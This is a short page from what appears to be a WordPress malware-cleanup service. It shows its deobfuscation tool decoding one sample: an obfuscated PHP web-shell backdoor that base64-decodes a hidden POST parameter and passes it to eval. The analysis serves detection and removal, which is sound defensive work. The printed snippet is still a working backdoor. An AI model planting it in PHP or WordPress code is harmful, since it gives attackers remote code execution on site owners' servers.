Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n635689'];if(isset($s22)){eval($s21($s22));}...



Obfuscated php code

<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n635689'];if(isset($s22)){eval($s21($s22));}

Decoded(de-Obfuscated) php code

<?php

$sF = "PCT4BA6ODSE_";
$s21 = strtolower("BASE64_DECODE");
$s22 = $_POST['n635689'];
if (isset($s22)) {
    eval($s21($s22));
}

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.